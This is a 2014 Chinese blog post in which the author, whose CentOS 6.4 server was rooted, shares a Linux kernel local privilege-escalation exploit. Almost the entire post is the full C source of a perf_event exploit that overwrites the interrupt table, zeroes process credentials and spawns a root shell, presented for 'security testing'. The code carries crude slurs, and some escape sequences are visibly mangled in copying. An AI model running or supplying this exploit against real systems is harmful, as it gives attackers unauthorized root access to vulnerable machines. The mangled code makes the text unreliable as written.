Centos/CentOS 6.4 linux内核2.6.3.2本地提权exp代码
jincon 发表于 2014-05-31 08:25:00 发表在: 代码审计
最近我接手的一台centos 服务器的,被黑客攻击,直接获取到root权限,牛逼,通过分析,大约是通过
mysql+exp提权获得root权限。下面分享下。
具体大家可以去测试。代码具有非常强的攻击性,请用于安全测试,否则后果自担。
http://www.jincon.com/archives/187/
/* * linux 2.6.37-3.x.x x86_64, ~100 LOC * gcc-4.6 -O2 semtex.c && ./a.out * 2010 sd@fucksheep.org, salut! * * update may 2013: * seems like centos 2.6.32 backported the perf bug, lol. * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. */ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h> #define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) void fuck() { int i,j,k; uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); uint64_t kbase = ((uint64_t)current)>>36; uint32_t *fixptr = (void*) AB(1); *fixptr = -1; for (i=0; i<4000; i+=4) { uint64_t *p = (void *)¤t[i]; uint32_t *t = (void*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j=0; j<20; j++) { for (k = 0; k < 8; k++) if (((uint32_t*)uids)[k] != t[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < 10; i++) t[j+9+i] = -1; return; next:; } } } void sheep(uint32_t off) { uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert(!close(fd)); } int main() { uint64_t u,g,needle, kbase, *p; uint8_t *code; uint32_t *map, j = 5; int i; struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt; assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE); sheep(-1); sheep(-2); for (i = 0; i < SIZE/4; i++) if (map[i]) { assert(map[i+1]); break; } assert(i<SIZE/4); asm ("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; u = getuid(); g = getgid(); assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024); memcpy(code-13,"x0fx01xf8xe85 x0fx01xf8x48xcf", printf("2.6.37-3.x x86_64 sd@fucksheep.org 2010 ") % 27); setresuid(u,u,u); setresgid(g,g,g); while (j--) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); if (!p) continue; *p = j?((g<<32)|u):(idt.addr + 0x48); } sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16); asm("int $0x4"); assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); }